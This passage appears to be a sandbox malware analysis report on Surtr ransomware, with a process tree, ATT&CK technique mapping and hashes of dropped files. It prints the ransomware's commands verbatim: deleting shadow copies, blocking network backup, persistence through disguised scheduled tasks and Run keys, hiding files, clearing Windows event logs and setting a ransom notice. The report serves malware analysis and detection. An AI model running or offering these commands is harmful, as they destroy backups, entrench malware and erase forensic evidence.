C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_0r6fjlh4j8u4ts.surt" "%TEMP%\Service\PublicData_0r6fjlh4j8u4ts.surt"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_0r6fjlh4j8u4ts.surt" "%TEMP%\Service\PrivateData_0r6fjlh4j8u4ts.surt"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R /S "C:\ProgramData\Service"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"2⤵
- Drops startup file
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe sl Security /e:false2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe sl Security /e:false3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Unfortunately , ALL Your Important Files Have Been Encrypted and Stolen By Surtr Ransomware. Find SURTR_README files and follow instructions." /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Unfortunately , ALL Your Important Files Have Been Encrypted and Stolen By Surtr Ransomware. Find SURTR_README files and follow instructions." /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Service\Surtr.exe"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s "C:\ProgramData\Service\Surtr.exe"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%TEMP%\Service\Surtr.exe"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h C:\ProgramData\Service\SurtrIcon.ico2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\ProgramData\Service\SurtrIcon.ico3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f2⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr\UserChoice /v ProgId /t REG_SZ /d surtr_auto_file /f2⤵
-
C:\Windows\SysWOW64\reg.exereg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr\UserChoice /v ProgId /t REG_SZ /d surtr_auto_file /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f2⤵
-
C:\Windows\SysWOW64\reg.exereg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f3⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wusvcs -p1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Registry Run Keys / Startup Folder
1Scheduled Task
1Hidden Files and Directories
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
1Modify Registry
3Indicator Removal on Host
1File Deletion
3Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exeMD5
664cf36657bf55f20cac44505d3bbb2c
SHA1a48f8089455201895757503255d0f573ce5d3c66
SHA2564a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35
SHA51242a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735
-
C:\ProgramData\Service\ID_DATA.surtMD5
6a9c4d683eb1fd05b1e465f85f6e330d
SHA1790812841eb765ae2b652870e94a0228bb0f87c8
SHA256576215c8df54d9bf4b24893b858d944b865c70c69c5b44c4e4bb9ba7b4da3934
SHA512af32822511e114affbdce6f2cabbdb0093f9eebad35f118106bc1a56f780d542a406e8c6321adc83359dc5ab25b4e9f6301c32de2bc0c3b37c0976e3ae84d7ce
-
C:\ProgramData\Service\PrivateData_0r6fjlh4j8u4ts.surtMD5
ff2c8ac371eb8b2045f804aecf15ce48
SHA104b49c0f8ed9a82b0af16d6db02a65564c4303d1
SHA256e9b3a98e0faec2b5df4aec83f18e70af067a215e1559431679b2c21209350936
SHA512fe950c9ad7d85c301c49e9b50bc80873697029b3ce982b0ace49d3e27dfd111e2274aecc28aa447ad19eb98e61411f137857d180f2b3f4eea08e73495fb986ce
-
C:\ProgramData\Service\PublicData_0r6fjlh4j8u4ts.surtMD5
76f1be0a10ef76babfb5cf1a236aba51
SHA17994d2552916faddc5da25b91f4f1a67227a2ca6
SHA256390334635beee3ed19baaf68f5270b84c8ebe7b27c9afe578b2fac614944a3e1
SHA512e8484a43700ddd5f6c5f0c74a09cfeb38cad9d4e3b7624ae6afbddbeba66a6d2603c2590691f5d3cd03975950e6b39393823022606a1939c82894301a76b3d11
-
C:\ProgramData\Service\SURTR_README.htaMD5
0cf4fbd6b2d441cfa231fa5ebe768595
SHA16395154e01920d200d15e49d6671a0bd47515361
SHA2564897e7b2d16870416c2c0bfc3e5da1e0cba52945c34f6d60a56220dceb6bd616
SHA5121c9c1a57d43f1ce350797e8ba7d2bf07c2e29c93c76ecb1095d850cbe37c7a9665ca100c0dc858e079383763301bdd51f7d106728aa1aeaf3ef1ebee5c1176b7
-
C:\ProgramData\Service\SURTR_README.txtMD5
d91dfe6ec91080570aa9d347d4554248
SHA1ecff8162a6b9cc6e93526c673977d95d491cfacd
SHA25611ab8837863ed5ae2063446dad6279eb5ec52de6f3c23b65449b5033715419e5
SHA51263c421e4f4e1f14a2b23ad36178402183a882ca63d7b9618aa17146a8deb3e1e2985f788c3b3aa51b7a5968f777c6fa0fdd10e6e46668c2bb7f54c3d03f39fa7
-
C:\ProgramData\Service\Surtr.exeMD5
664cf36657bf55f20cac44505d3bbb2c
SHA1a48f8089455201895757503255d0f573ce5d3c66
SHA2564a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35
SHA51242a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735
-
C:\ProgramData\Service\SurtrBackGround.jpgMD5
33f7fc301be9d39fcb474fb8b1e5f42e
SHA1a3bf9ddb2ac53bc4b12b249825189a7c7a07b766
SHA25699cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03
SHA5126cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00
-
C:\ProgramData\Service\SurtrIcon.icoMD5
3257eb22824b57fe3d58074bca3128d3
SHA16f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97
SHA2565afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad
SHA5127b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d
-
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exeMD5
664cf36657bf55f20cac44505d3bbb2c
SHA1a48f8089455201895757503255d0f573ce5d3c66
SHA2564a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35
SHA51242a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exeMD5
664cf36657bf55f20cac44505d3bbb2c
SHA1a48f8089455201895757503255d0f573ce5d3c66
SHA2564a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35
SHA51242a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735